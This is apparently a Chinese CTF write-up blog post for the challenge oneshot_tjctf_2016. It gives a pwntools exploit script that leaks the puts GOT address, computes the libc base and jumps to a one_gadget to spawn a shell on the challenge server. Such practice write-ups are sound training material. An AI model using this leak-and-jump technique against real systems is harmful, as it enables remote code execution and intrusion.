oneshot_tjctf_2016


简单题,容易想到先泄漏libc基址,然后jump to onegadget 从而getshell


from pwn import *

'''
author: lemon
time: 2020-10-26
libc: libc-2.23.so
python version: 2
'''

local = 0

binary = "./oneshot_tjctf_2016"
libc_path = './libc-2.23.so'
port = "25643"

if local == 1:
	p = process(binary)
else:
	p = remote("node3.buuoj.cn",port)

def dbg():
	context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']
elf = ELF(binary)
libc = ELF(libc_path)

puts_got = elf.got['puts']
dbg()
p.recvuntil('Read location?')
p.sendline(str(puts_got))
# puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
p.recvuntil('0x0000')
puts_addr = int(p.recv(12),16)
print "puts address : ",hex(puts_addr)

libc_base = puts_addr - libc.sym['puts']
onegadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]
print "[*] libc_base:",hex(libc_base)
onegadgegt = libc_base + onegadget_list[3]

p.recvuntil('Jump location?')
payload = onegadgegt
p.sendline(str(payload))

# gdb.attach(p)
p.interactive()

posted @ 2020-10-26 09:00  lemon想学二进制  阅读(172)  评论(0编辑  收藏  举报